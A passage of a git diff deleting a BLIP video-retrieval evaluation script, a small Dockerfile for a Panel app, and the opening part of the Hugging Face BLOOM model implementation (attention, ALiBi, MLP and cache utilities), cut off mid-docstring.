-import torch -import torch.nn as nn -import torch.nn.functional as F -import torch.backends.cudnn as cudnn -import torch.distributed as dist -from torch.utils.data import DataLoader - -from models.blip_retrieval import blip_retrieval -import utils -from data.video_dataset import VideoDataset - - -@torch.no_grad() -def evaluation(model, data_loader, tokenizer, device, config): - # test - model.eval() - - metric_logger = utils.MetricLogger(delimiter=" ") - header = 'Evaluation:' - - print('Computing features for evaluation...') - start_time = time.time() - - texts = data_loader.dataset.text - num_text = len(texts) - text_bs = 256 - text_ids = [] - text_embeds = [] - text_atts = [] - for i in range(0, num_text, text_bs): - text = texts[i: min(num_text, i+text_bs)] - text_input = tokenizer(text, padding='max_length', truncation=True, max_length=35, return_tensors="pt").to(device) - text_output = model.text_encoder(text_input.input_ids, attention_mask = text_input.attention_mask, mode='text') - text_embed = F.normalize(model.text_proj(text_output.last_hidden_state[:,0,:])) - text_embeds.append(text_embed) - text_ids.append(text_input.input_ids) - text_atts.append(text_input.attention_mask) - - text_embeds = torch.cat(text_embeds,dim=0) - text_ids = torch.cat(text_ids,dim=0) - text_atts = torch.cat(text_atts,dim=0) - text_ids[:,0] = tokenizer.additional_special_tokens_ids[0] - - video_feats = [] - video_embeds = [] - for video, video_id in data_loader: - - B,N,C,W,H = video.size() - video = video.view(-1,C,W,H) - video = video.to(device,non_blocking=True) - video_feat = model.visual_encoder(video) - video_embed = model.vision_proj(video_feat[:,0,:]) - video_embed = video_embed.view(B,N,-1).mean(dim=1) - video_embed = 
F.normalize(video_embed,dim=-1) - - video_feat = video_feat.view(B,-1,video_feat.shape[-1]) - video_feats.append(video_feat.cpu()) - video_embeds.append(video_embed) - - video_feats = torch.cat(video_feats,dim=0) - video_embeds = torch.cat(video_embeds,dim=0) - - sims_matrix = video_embeds @ text_embeds.t() - score_matrix_v2t = torch.full((len(texts),len(texts)),-100.0).to(device) - - num_tasks = utils.get_world_size() - rank = utils.get_rank() - step = sims_matrix.size(0)//num_tasks + 1 - start = rank*step - end = min(sims_matrix.size(0),start+step) - - for i,sims in enumerate(metric_logger.log_every(sims_matrix[start:end], 50, header)): - topk_sim, topk_idx = sims.topk(k=config['k_test'], dim=0) - - encoder_output = video_feats[start+i].repeat(config['k_test'],1,1).to(device,non_blocking=True) - encoder_att = torch.ones(encoder_output.size()[:-1],dtype=torch.long).to(device,non_blocking=True) - output = model.text_encoder(text_ids[topk_idx], - attention_mask = text_atts[topk_idx], - encoder_hidden_states = encoder_output, - encoder_attention_mask = encoder_att, - return_dict = True, - ) - score = model.itm_head(output.last_hidden_state[:,0,:])[:,1] - score_matrix_v2t[start+i,topk_idx] = score + topk_sim - - sims_matrix = sims_matrix.t() - score_matrix_t2v = torch.full((len(texts),len(texts)),-100.0).to(device) - - step = sims_matrix.size(0)//num_tasks + 1 - start = rank*step - end = min(sims_matrix.size(0),start+step) - - for i,sims in enumerate(metric_logger.log_every(sims_matrix[start:end], 50, header)): - - topk_sim, topk_idx = sims.topk(k=config['k_test'], dim=0) - encoder_output = video_feats[topk_idx].to(device,non_blocking=True) - encoder_att = torch.ones(encoder_output.size()[:-1],dtype=torch.long).to(device,non_blocking=True) - output = model.text_encoder(text_ids[start+i].repeat(config['k_test'],1), - attention_mask = text_atts[start+i].repeat(config['k_test'],1), - encoder_hidden_states = encoder_output, - encoder_attention_mask = encoder_att, - return_dict = True, - ) - score = model.itm_head(output.last_hidden_state[:,0,:])[:,1] - score_matrix_t2v[start+i,topk_idx] = score + topk_sim - - if args.distributed: - dist.barrier() - torch.distributed.all_reduce(score_matrix_v2t, op=torch.distributed.ReduceOp.SUM) - torch.distributed.all_reduce(score_matrix_t2v, op=torch.distributed.ReduceOp.SUM) - - total_time = time.time() - start_time - total_time_str = str(datetime.timedelta(seconds=int(total_time))) - print('Evaluation time {}'.format(total_time_str)) - - return score_matrix_v2t.cpu().numpy(), score_matrix_t2v.cpu().numpy() - - - -@torch.no_grad() -def itm_eval(scores_v2t, scores_t2v, txt2vmg, vid2txt): - - #Video->Text - ranks = np.zeros(scores_v2t.shape[0]) - for index,score in enumerate(scores_v2t): - inds = np.argsort(score)[::-1] - ranks[index] = np.where(inds == vid2txt[index])[0][0] - - # Compute metrics - tr1 = 100.0 * len(np.where(ranks < 1)[0]) / len(ranks) - tr5 = 100.0 * len(np.where(ranks < 5)[0]) / len(ranks) - tr10 = 100.0 * len(np.where(ranks < 10)[0]) / len(ranks) - - #Text->Video - ranks = np.zeros(scores_t2v.shape[0]) - - for index,score in enumerate(scores_t2v): - inds = np.argsort(score)[::-1] - ranks[index] = np.where(inds == txt2vmg[index])[0][0] - - mdR = np.median(ranks+1) - - # Compute metrics - vr1 = 100.0 * len(np.where(ranks < 1)[0]) / len(ranks) - vr5 = 100.0 * len(np.where(ranks < 5)[0]) / len(ranks) - vr10 = 100.0 * len(np.where(ranks < 10)[0]) / len(ranks) - - tr_mean = (tr1 + tr5 + tr10) / 3 - vr_mean = (vr1 + vr5 + vr10) / 3 - r_mean = 
(tr_mean + vr_mean) / 2 - - eval_result = {'txt_r1': tr1, - 'txt_r5': tr5, - 'txt_r10': tr10, - 'txt_r_mean': tr_mean, - 'vid_r1': vr1, - 'vid_r5': vr5, - 'vid_r10': vr10, - 'vid_r_mean': vr_mean, - 'vid_mdR': mdR, - 'r_mean': r_mean} - return eval_result - - - - -def main(args, config): - utils.init_distributed_mode(args) - - device = torch.device(args.device) - - # fix the seed for reproducibility - seed = args.seed + utils.get_rank() - torch.manual_seed(seed) - np.random.seed(seed) - random.seed(seed) - cudnn.benchmark = True - - #### Dataset #### - print("Creating retrieval dataset") - test_dataset = VideoDataset(config['video_root'],config['ann_root'],num_frm=config['num_frm_test'], - max_img_size=config['image_size'], frm_sampling_strategy='uniform') - - test_loader = DataLoader( - test_dataset, - batch_size=config['batch_size'], - num_workers=4, - pin_memory=True, - drop_last=False, - shuffle=False, - ) - - #### Model #### - print("Creating model") - model = blip_retrieval(pretrained=config['pretrained'], image_size=config['image_size'], vit=config['vit']) - - model = model.to(device) - - model_without_ddp = model - if args.distributed: - model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu]) - model_without_ddp = model.module - - score_v2t, score_t2v, = evaluation(model_without_ddp, test_loader, model_without_ddp.tokenizer, device, config) - - if utils.is_main_process(): - - test_result = itm_eval(score_v2t, score_t2v, test_loader.dataset.txt2video, test_loader.dataset.video2txt) - print(test_result) - - log_stats = {**{f'{k}': v for k, v in test_result.items()},} - with open(os.path.join(args.output_dir, "test_result.txt"),"a") as f: - f.write(json.dumps(log_stats) + "\n") - - -if __name__ == '__main__': - parser = argparse.ArgumentParser() - parser.add_argument('--config', default='./configs/retrieval_msrvtt.yaml') - parser.add_argument('--output_dir', default='output/Retrieval_msrvtt') - parser.add_argument('--device', default='cuda') - parser.add_argument('--seed', default=42, type=int) - parser.add_argument('--world_size', default=1, type=int, help='number of distributed processes') - parser.add_argument('--dist_url', default='env://', help='url used to set up distributed training') - parser.add_argument('--distributed', default=True, type=bool) - args = parser.parse_args() - - config = yaml.load(open(args.config, 'r'), Loader=yaml.Loader) - - Path(args.output_dir).mkdir(parents=True, exist_ok=True) - - yaml.dump(config, open(os.path.join(args.output_dir, 'config.yaml'), 'w')) - - main(args, config) \ No newline at end of file diff --git a/spaces/yifangtongxing/qsign/Dockerfile b/spaces/yifangtongxing/qsign/Dockerfile deleted file mode 100644 index c33a0787f9bfc4eb7088822ae9e724bad601c068..0000000000000000000000000000000000000000 --- a/spaces/yifangtongxing/qsign/Dockerfile +++ /dev/null @@ -1,16 +0,0 @@ -FROM python:3.9 - -WORKDIR /code - -COPY ./requirements.txt /code/requirements.txt -RUN python3 -m pip install --no-cache-dir --upgrade pip -RUN python3 -m pip install --no-cache-dir --upgrade -r /code/requirements.txt - -COPY . . 
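# Note: requirements.txt is copied and installed before the "COPY . ." above so the pip install layer
# stays cached and is only rebuilt when requirements.txt itself changes.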
- -CMD ["panel", "serve", "/code/app.py", "--address", "0.0.0.0", "--port", "7860", "--allow-websocket-origin", "*"] - -RUN mkdir /.cache -RUN chmod 777 /.cache -RUN mkdir .chroma -RUN chmod 777 .chroma \ No newline at end of file diff --git a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/bloom/modeling_bloom.py b/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/bloom/modeling_bloom.py deleted file mode 100644 index d12ec1724f7097cdfedf6cfd6b2541ab74a9a1c2..0000000000000000000000000000000000000000 --- a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/bloom/modeling_bloom.py +++ /dev/null @@ -1,1297 +0,0 @@ -# coding=utf-8 -# Copyright 2022 HuggingFace Inc. team and BigScience workshop. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -"""PyTorch BLOOM model.""" - -import math -import warnings -from typing import Optional, Tuple, Union - -import torch -import torch.utils.checkpoint -from torch import nn -from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, LayerNorm, MSELoss -from torch.nn import functional as F - -from ...file_utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward -from ...modeling_outputs import ( - BaseModelOutputWithPastAndCrossAttentions, - CausalLMOutputWithCrossAttentions, - QuestionAnsweringModelOutput, - SequenceClassifierOutputWithPast, - TokenClassifierOutput, -) -from ...modeling_utils import PreTrainedModel -from ...utils import logging -from .configuration_bloom import BloomConfig - - -logger = logging.get_logger(__name__) - -_CHECKPOINT_FOR_DOC = "bigscience/bloom-560m" -_CONFIG_FOR_DOC = "BloomConfig" - -BLOOM_PRETRAINED_MODEL_ARCHIVE_LIST = [ - "bigscience/bigscience-small-testing", - "bigscience/bloom-560m", - "bigscience/bloom-1b1", - "bigscience/bloom-1b7", - "bigscience/bloom-3b", - "bigscience/bloom-7b1", - "bigscience/bloom", -] - - -def _make_causal_mask( - input_ids_shape: torch.Size, device: torch.device, past_key_values_length: int -) -> torch.BoolTensor: - """ - Make causal mask used for self-attention. - """ - batch_size, target_length = input_ids_shape - mask = torch.empty((target_length, target_length + past_key_values_length), dtype=torch.bool, device=device) - # ONNX doesn't support `torch.Tensor.triu` properly, thus we use this workaround - seq_ids = torch.arange(target_length, device=device) - mask[:, past_key_values_length:] = seq_ids[:, None] < seq_ids[None, :] - - if past_key_values_length > 0: - mask[:, :past_key_values_length] = False - - expanded_mask = mask[None, None, :, :].expand(batch_size, 1, target_length, target_length + past_key_values_length) - return expanded_mask - - -def _expand_mask(mask: torch.Tensor, tgt_length: int) -> torch.BoolTensor: - """ - Expands attention_mask from `[batch_size, src_length]` to `[batch_size, 1, tgt_length, src_length]`. 
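    For example (shapes only, illustrative): a padding mask of shape `[2, 5]` becomes a boolean mask of shape
    `[2, 1, tgt_length, 5]` in which `True` marks the positions to be masked out.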
- """ - batch_size, src_length = mask.shape - tgt_length = tgt_length if tgt_length is not None else src_length - - expanded_mask = ~(mask[:, None, None, :].to(torch.bool)) - return expanded_mask.expand(batch_size, 1, tgt_length, src_length) - - -def build_alibi_tensor(attention_mask: torch.Tensor, num_heads: int, dtype: torch.dtype) -> torch.Tensor: - """ - Link to paper: https://arxiv.org/abs/2108.12409 Alibi tensor is not causal as the original paper mentions, it - relies on a translation invariance of softmax for quick implementation: with l being a tensor, and a fixed value - `softmax(l+a) = softmax(l)`. Based on - https://github.com/ofirpress/attention_with_linear_biases/blob/a35aaca144e0eb6b789dfcb46784c4b8e31b7983/fairseq/models/transformer.py#L742 - TODO @thomasw21 this doesn't work as nicely due to the masking strategy, and so masking varies slightly. - - Args: - Returns tensor shaped (batch_size * num_heads, 1, max_seq_len) - attention_mask (`torch.Tensor`): - Token-wise attention mask, this should be of shape (batch_size, max_seq_len). - num_heads (`int`, *required*): - number of heads - dtype (`torch.dtype`, *optional*, default=`torch.bfloat16`): - dtype of the output tensor - """ - batch_size, seq_length = attention_mask.shape - closest_power_of_2 = 2 ** math.floor(math.log2(num_heads)) - base = torch.tensor( - 2 ** (-(2 ** -(math.log2(closest_power_of_2) - 3))), device=attention_mask.device, dtype=torch.float32 - ) - powers = torch.arange(1, 1 + closest_power_of_2, device=attention_mask.device, dtype=torch.int32) - slopes = torch.pow(base, powers) - - if closest_power_of_2 != num_heads: - extra_base = torch.tensor( - 2 ** (-(2 ** -(math.log2(2 * closest_power_of_2) - 3))), device=attention_mask.device, dtype=torch.float32 - ) - num_remaining_heads = min(closest_power_of_2, num_heads - closest_power_of_2) - extra_powers = torch.arange(1, 1 + 2 * num_remaining_heads, 2, device=attention_mask.device, dtype=torch.int32) - slopes = torch.cat([slopes, torch.pow(extra_base, extra_powers)], dim=0) - - # Note: alibi will added to the attention bias that will be applied to the query, key product of attention - # => therefore alibi will have to be of shape (batch_size, num_heads, query_length, key_length) - # => here we set (batch_size=1, num_heads=num_heads, query_length=1, key_length=max_length) - # => the query_length dimension will then be broadcasted correctly - # This is more or less identical to T5's relative position bias: - # https://github.com/huggingface/transformers/blob/f681437203baa7671de3174b0fa583c349d9d5e1/src/transformers/models/t5/modeling_t5.py#L527 - arange_tensor = ((attention_mask.cumsum(dim=-1) - 1) * attention_mask)[:, None, :] - alibi = slopes[..., None] * arange_tensor - return alibi.reshape(batch_size * num_heads, 1, seq_length).to(dtype) - - -def dropout_add(x: torch.Tensor, residual: torch.Tensor, prob: float, training: bool) -> torch.Tensor: - """ - Dropout add function - - Args: - x (`torch.tensor`, *required*): - input tensor - residual (`torch.tensor`, *required*): - residual tensor - prob (`float`, *required*): - dropout probability - training (`bool`, *required*): - training mode - """ - out = F.dropout(x, p=prob, training=training) - out = residual + out - return out - - -def bloom_gelu_forward(x: torch.Tensor) -> torch.Tensor: - """ - Custom bias GELU function. Adapted from Megatron-DeepSpeed code. Here we use a simple implementation (inference) to - make the model jitable. 
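# --- Editor's illustrative aside (not part of the original file) ---------------
# A minimal, standalone sketch of the per-head slope schedule that
# `build_alibi_tensor` above constructs, assuming only the formulas shown there.
# The helper name `alibi_slopes` is hypothetical and for demonstration only.
import math
import torch

def alibi_slopes(num_heads: int) -> torch.Tensor:
    closest_power_of_2 = 2 ** math.floor(math.log2(num_heads))
    base = 2 ** (-(2 ** -(math.log2(closest_power_of_2) - 3)))
    slopes = torch.tensor(base) ** torch.arange(1, 1 + closest_power_of_2, dtype=torch.float32)
    if closest_power_of_2 != num_heads:
        # Heads beyond the nearest power of two get extra, interleaved slope values.
        extra_base = 2 ** (-(2 ** -(math.log2(2 * closest_power_of_2) - 3)))
        num_remaining = min(closest_power_of_2, num_heads - closest_power_of_2)
        extra_powers = torch.arange(1, 1 + 2 * num_remaining, 2, dtype=torch.float32)
        slopes = torch.cat([slopes, torch.tensor(extra_base) ** extra_powers])
    return slopes

# e.g. alibi_slopes(12) yields 12 geometrically decreasing per-head slopes; the bias
# added to the attention scores for head h is slopes[h] times the token position,
# broadcast over the key length exactly as done in build_alibi_tensor above.
# ------------------------------------------------------------------------------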
- - Args: - x (`torch.tensor`, *required*): - input hidden states - """ - return x * 0.5 * (1.0 + torch.tanh(0.79788456 * x * (1 + 0.044715 * x * x))) - - -def bloom_gelu_back(g: torch.Tensor, x: torch.Tensor) -> torch.Tensor: - """ - gradient of tanh approximation of gelu gradient of actual gelu is: 0.5 * (1. + torch.erf(x * 0.70710678)) + - 0.3989423 * x * torch.exp(-0.5 * x * x) - - Args: - g (`torch.tensor`, *required*): - gradient output tensor - x (`torch.tensor`, *required*): - input tensor - """ - x = x[0] # x is a tuple of 1 element, needs to unpack it first - tanh_out = torch.tanh(0.79788456 * x * (1 + 0.044715 * x * x)) - # sqrt(2/pi) * 3 * 0.044715 -> 0.1070322243 - ff = 0.5 * x * ((1 - tanh_out * tanh_out) * (0.79788456 + 0.1070322243 * x * x)) + 0.5 * (1 + tanh_out) - return ff * g - - -class GeLUFunction(torch.autograd.Function): - @staticmethod - def forward(ctx, input: torch.Tensor) -> torch.Tensor: - ctx.save_for_backward(input) - return bloom_gelu_forward(input) - - @staticmethod - def backward(ctx, grad_output: torch.Tensor) -> torch.Tensor: - input = ctx.saved_tensors - tmp = bloom_gelu_back(grad_output, input) - return tmp - - -class BloomGelu(nn.Module): - """ - BloomBiasGelu wrapper function that make use of the simple function on inference mode to make the model - torchscriptable and use the autograd function in training mode to get the accurate results of the gradients Partly - copied from Megatron-DeepSpeed code and adapted for our needs - - See here why autograd functions are not torchscriptable: https://github.com/pytorch/pytorch/issues/22329 - """ - - def __init__(self): - super().__init__() - - def forward(self, x: torch.Tensor) -> torch.Tensor: - if self.training: - return GeLUFunction.apply(x) - else: - return bloom_gelu_forward(x) - - -class BloomAttention(nn.Module): - def __init__(self, config: BloomConfig): - super().__init__() - - self.pretraining_tp = config.pretraining_tp - self.slow_but_exact = config.slow_but_exact - - self.hidden_size = config.hidden_size - self.num_heads = config.n_head - self.head_dim = self.hidden_size // self.num_heads - self.split_size = self.hidden_size - self.hidden_dropout = config.hidden_dropout - - if self.head_dim * self.num_heads != self.hidden_size: - raise ValueError( - f"`hidden_size` must be divisible by num_heads (got `hidden_size`: {self.hidden_size} and `num_heads`:" - f" {self.num_heads})." 
- ) - - # Layer-wise attention scaling - self.inv_norm_factor = 1.0 / math.sqrt(self.head_dim) - self.beta = 1.0 - - self.query_key_value = nn.Linear(self.hidden_size, 3 * self.hidden_size, bias=True) - self.dense = nn.Linear(self.hidden_size, self.hidden_size) - self.attention_dropout = nn.Dropout(config.attention_dropout) - - def _split_heads(self, fused_qkv: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]: - """ - Split the last dimension into (num_heads, head_dim) without making any copies, results share same memory - storage as `fused_qkv` - - Args: - fused_qkv (`torch.tensor`, *required*): [batch_size, seq_length, num_heads * 3 * head_dim] - - Returns: - query: [batch_size, seq_length, num_heads, head_dim] key: [batch_size, seq_length, num_heads, head_dim] - value: [batch_size, seq_length, num_heads, head_dim] - """ - batch_size, seq_length, three_times_hidden_size = fused_qkv.shape - fused_qkv = fused_qkv.view(batch_size, seq_length, self.num_heads, 3, self.head_dim) - return fused_qkv[..., 0, :], fused_qkv[..., 1, :], fused_qkv[..., 2, :] - - def _merge_heads(self, x: torch.Tensor) -> torch.Tensor: - """ - Merge heads together over the last dimension - - Args: - x (`torch.tensor`, *required*): [batch_size * num_heads, seq_length, head_dim] - - Returns: - torch.tensor: [batch_size, seq_length, num_heads * head_dim] - """ - # What we want to achieve is: - # batch_size * num_heads, seq_length, head_dim -> batch_size, seq_length, num_heads * head_dim - batch_size_and_num_heads, seq_length, _ = x.shape - batch_size = batch_size_and_num_heads // self.num_heads - - # First view to decompose the batch size - # batch_size * num_heads, seq_length, head_dim -> batch_size, num_heads, seq_length, head_dim - x = x.view(batch_size, self.num_heads, seq_length, self.head_dim) - - # batch_size, num_heads, seq_length, head_dim -> batch_size, seq_length, num_heads, head_dim - x = x.permute(0, 2, 1, 3) - - # batch_size, seq_length, num_heads, head_dim -> batch_size, seq_length, num_heads * head_dim - return x.reshape(batch_size, seq_length, self.num_heads * self.head_dim) - - def forward( - self, - hidden_states: torch.Tensor, - residual: torch.Tensor, - alibi: torch.Tensor, - attention_mask: torch.Tensor, - layer_past: Optional[Tuple[torch.Tensor, torch.Tensor]] = None, - head_mask: Optional[torch.Tensor] = None, - use_cache: bool = False, - output_attentions: bool = False, - ): - fused_qkv = self.query_key_value(hidden_states) # [batch_size, seq_length, 3 x hidden_size] - - # 3 x [batch_size, seq_length, num_heads, head_dim] - (query_layer, key_layer, value_layer) = self._split_heads(fused_qkv) - - batch_size, q_length, _, _ = query_layer.shape - - query_layer = query_layer.transpose(1, 2).reshape(batch_size * self.num_heads, q_length, self.head_dim) - key_layer = key_layer.permute(0, 2, 3, 1).reshape(batch_size * self.num_heads, self.head_dim, q_length) - value_layer = value_layer.transpose(1, 2).reshape(batch_size * self.num_heads, q_length, self.head_dim) - if layer_past is not None: - past_key, past_value = layer_past - # concatenate along seq_length dimension: - # - key: [batch_size * self.num_heads, head_dim, kv_length] - # - value: [batch_size * self.num_heads, kv_length, head_dim] - key_layer = torch.cat((past_key, key_layer), dim=2) - value_layer = torch.cat((past_value, value_layer), dim=1) - - _, _, kv_length = key_layer.shape - - if use_cache is True: - present = (key_layer, value_layer) - else: - present = None - - # [batch_size * num_heads, q_length, kv_length] - # we 
use `torch.Tensor.baddbmm` instead of `torch.baddbmm` as the latter isn't supported by TorchScript v1.11 - matmul_result = alibi.baddbmm( - batch1=query_layer, - batch2=key_layer, - beta=self.beta, - alpha=self.inv_norm_factor, - ) - - # change view to [batch_size, num_heads, q_length, kv_length] - attention_scores = matmul_result.view(batch_size, self.num_heads, q_length, kv_length) - - # cast attention scores to fp32, compute scaled softmax and cast back to initial dtype - [batch_size, num_heads, q_length, kv_length] - input_dtype = attention_scores.dtype - # `float16` has a minimum value of -65504.0, whereas `bfloat16` and `float32` have a minimum value of `-3.4e+38` - if input_dtype == torch.float16: - attention_scores = attention_scores.to(torch.float) - attn_weights = torch.masked_fill(attention_scores, attention_mask, torch.finfo(attention_scores.dtype).min) - attention_probs = F.softmax(attn_weights, dim=-1, dtype=torch.float32).to(input_dtype) - - # [batch_size, num_heads, q_length, kv_length] - attention_probs = self.attention_dropout(attention_probs) - - if head_mask is not None: - attention_probs = attention_probs * head_mask - - # change view [batch_size x num_heads, q_length, kv_length] - attention_probs_reshaped = attention_probs.view(batch_size * self.num_heads, q_length, kv_length) - - # matmul: [batch_size * num_heads, q_length, head_dim] - context_layer = torch.bmm(attention_probs_reshaped, value_layer) - - # change view [batch_size, q_length, num_heads * head_dim] - context_layer = self._merge_heads(context_layer) - - # aggregate results across tp ranks. See here: https://github.com/pytorch/pytorch/issues/76232 - if self.pretraining_tp > 1 and self.slow_but_exact: - slices = self.hidden_size / self.pretraining_tp - output_tensor = torch.zeros_like(context_layer) - for i in range(self.pretraining_tp): - output_tensor = output_tensor + F.linear( - context_layer[:, :, int(i * slices) : int((i + 1) * slices)], - self.dense.weight[:, int(i * slices) : int((i + 1) * slices)], - ) - else: - output_tensor = self.dense(context_layer) - - output_tensor = dropout_add(output_tensor, residual, self.hidden_dropout, self.training) - - outputs = (output_tensor, present) - if output_attentions: - outputs += (attention_probs,) - - return outputs - - -class BloomMLP(nn.Module): - def __init__(self, config: BloomConfig): - super().__init__() - hidden_size = config.hidden_size - - self.pretraining_tp = config.pretraining_tp - self.slow_but_exact = config.slow_but_exact - self.dense_h_to_4h = nn.Linear(hidden_size, 4 * hidden_size) - self.gelu_impl = BloomGelu() - self.dense_4h_to_h = nn.Linear(4 * hidden_size, hidden_size) - self.hidden_dropout = config.hidden_dropout - - def forward(self, hidden_states: torch.Tensor, residual: torch.Tensor) -> torch.Tensor: - hidden_states = self.gelu_impl(self.dense_h_to_4h(hidden_states)) - - if self.pretraining_tp > 1 and self.slow_but_exact: - intermediate_output = torch.zeros_like(residual) - slices = self.dense_4h_to_h.weight.shape[-1] / self.pretraining_tp - for i in range(self.pretraining_tp): - intermediate_output = intermediate_output + F.linear( - hidden_states[:, :, int(i * slices) : int((i + 1) * slices)], - self.dense_4h_to_h.weight[:, int(i * slices) : int((i + 1) * slices)], - ) - else: - intermediate_output = self.dense_4h_to_h(hidden_states) - - output = dropout_add(intermediate_output, residual, self.hidden_dropout, self.training) - - return output - - -class BloomBlock(nn.Module): - def __init__(self, config: BloomConfig): - 
super().__init__() - hidden_size = config.hidden_size - - self.input_layernorm = LayerNorm(hidden_size, eps=config.layer_norm_epsilon) - self.num_heads = config.n_head - self.self_attention = BloomAttention(config) - self.post_attention_layernorm = LayerNorm(hidden_size, eps=config.layer_norm_epsilon) - - self.mlp = BloomMLP(config) - - self.apply_residual_connection_post_layernorm = config.apply_residual_connection_post_layernorm - self.hidden_dropout = config.hidden_dropout - - def forward( - self, - hidden_states: torch.Tensor, - alibi: torch.Tensor, - attention_mask: torch.Tensor, - layer_past: Optional[Tuple[torch.Tensor, torch.Tensor]] = None, - head_mask: Optional[torch.Tensor] = None, - use_cache: bool = False, - output_attentions: bool = False, - ): - # hidden_states: [batch_size, seq_length, hidden_size] - - # Layer norm at the beginning of the transformer layer. - layernorm_output = self.input_layernorm(hidden_states) - - # Layer norm post the self attention. - if self.apply_residual_connection_post_layernorm: - residual = layernorm_output - else: - residual = hidden_states - - # Self attention. - attn_outputs = self.self_attention( - layernorm_output, - residual, - layer_past=layer_past, - attention_mask=attention_mask, - alibi=alibi, - head_mask=head_mask, - use_cache=use_cache, - output_attentions=output_attentions, - ) - - attention_output = attn_outputs[0] - - outputs = attn_outputs[1:] - - layernorm_output = self.post_attention_layernorm(attention_output) - - # Get residual - if self.apply_residual_connection_post_layernorm: - residual = layernorm_output - else: - residual = attention_output - - # MLP. - output = self.mlp(layernorm_output, residual) - - if use_cache: - outputs = (output,) + outputs - else: - outputs = (output,) + outputs[1:] - - return outputs # hidden_states, present, attentions - - -class BloomPreTrainedModel(PreTrainedModel): - config_class = BloomConfig - base_model_prefix = "transformer" - supports_gradient_checkpointing = True - _no_split_modules = ["BloomBlock"] - _skip_keys_device_placement = "past_key_values" - - def __init__(self, *inputs, **kwargs): - super().__init__(*inputs, **kwargs) - - def _init_weights(self, module: nn.Module): - """Initialize the weights.""" - if isinstance(module, nn.Linear): - # Slightly different from the TF version which uses truncated_normal for initialization - # cf https://github.com/pytorch/pytorch/pull/5617 - module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) - if module.bias is not None: - module.bias.data.zero_() - elif isinstance(module, nn.Embedding): - module.weight.data.normal_(mean=0.0, std=self.config.initializer_range) - if module.padding_idx is not None: - module.weight.data[module.padding_idx].zero_() - elif isinstance(module, LayerNorm): - module.bias.data.zero_() - module.weight.data.fill_(1.0) - - def _set_gradient_checkpointing(self, module: nn.Module, value: bool = False): - if isinstance(module, BloomModel): - module.gradient_checkpointing = value - - @staticmethod - def _convert_to_standard_cache( - past_key_value: Tuple[Tuple[torch.Tensor, torch.Tensor]], batch_size: int - ) -> Tuple[Tuple[torch.Tensor, torch.Tensor]]: - """ - Standardizes the format of the cache so as to match most implementations, i.e. 
to tuple(tuple([batch_size, - num_heads, ...])) - """ - batch_size_times_num_heads, head_dim, seq_length = past_key_value[0][0].shape - num_heads = batch_size_times_num_heads // batch_size - # key: [batch_size * num_heads, head_dim, seq_length] -> [batch_size, num_heads, head_dim, seq_length] - # value: [batch_size * num_heads, seq_length, head_dim] -> [batch_size, num_heads, seq_length, head_dim] - return tuple( - ( - layer_past[0].view(batch_size, num_heads, head_dim, seq_length), - layer_past[1].view(batch_size, num_heads, seq_length, head_dim), - ) - for layer_past in past_key_value - ) - - @staticmethod - def _convert_to_bloom_cache( - past_key_value: Tuple[Tuple[torch.Tensor, torch.Tensor]] - ) -> Tuple[Tuple[torch.Tensor, torch.Tensor]]: - """ - Converts the cache to the format expected by Bloom, i.e. to tuple(tuple([batch_size * num_heads, ...])) - """ - batch_size, num_heads, head_dim, seq_length = past_key_value[0][0].shape - batch_size_times_num_heads = batch_size * num_heads - # key: [batch_size, num_heads, head_dim, seq_length] -> [batch_size * num_heads, head_dim, seq_length] - # value: [batch_size, num_heads, seq_length, head_dim] -> [batch_size * num_heads, seq_length, head_dim] - return tuple( - ( - layer_past[0].view(batch_size_times_num_heads, head_dim, seq_length), - layer_past[1].view(batch_size_times_num_heads, seq_length, head_dim), - ) - for layer_past in past_key_value - ) - - -BLOOM_START_DOCSTRING = r""" - - This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the - library implements for all its model (such as downloading or saving, resizing the input embeddings etc.) - - This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. - Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage - and behavior. - - Parameters: - config ([`BloomConfig`]): Model configuration class with all the parameters of the model. - Initializing with a config file does not load the weights associated with the model, only the - configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights. -""" - -BLOOM_INPUTS_DOCSTRING = r""" - Args: - input_ids (`torch.LongTensor` of shape `(batch_size, input_ids_length)`): - `input_ids_length` = `sequence_length` if `past_key_values` is `None` else `past_key_values[0][0].shape[2]` - (`sequence_length` of input past key value states). Indices of input sequence tokens in the vocabulary. - - If `past_key_values` is used, only `input_ids` that do not have their past calculated should be passed as - `input_ids`. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are input IDs?](../glossary#input-ids) - past_key_values (`Tuple[Tuple[torch.Tensor]]` of length `config.n_layers`): - Contains precomputed hidden-states (key and values in the attention blocks) as computed by the model (see - `past_key_values` output below). Can be used to speed up sequential decoding. The `input_ids` which have - their past given to this model should not be passed as `input_ids` as they have already been computed. 
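# --- Editor's illustrative aside (not part of the original file) ---------------
# `_convert_to_standard_cache` / `_convert_to_bloom_cache` above only reshape
# between the fused [batch_size * num_heads, ...] layout and the per-head
# [batch_size, num_heads, ...] layout. A toy round trip (shapes are assumptions):
import torch

batch_size, num_heads, head_dim, kv_length = 2, 4, 8, 5
key = torch.randn(batch_size * num_heads, head_dim, kv_length)    # Bloom key layout
value = torch.randn(batch_size * num_heads, kv_length, head_dim)  # Bloom value layout

std_key = key.view(batch_size, num_heads, head_dim, kv_length)    # "standard" layout
std_value = value.view(batch_size, num_heads, kv_length, head_dim)

# Converting back recovers the original tensors; the views share the same storage.
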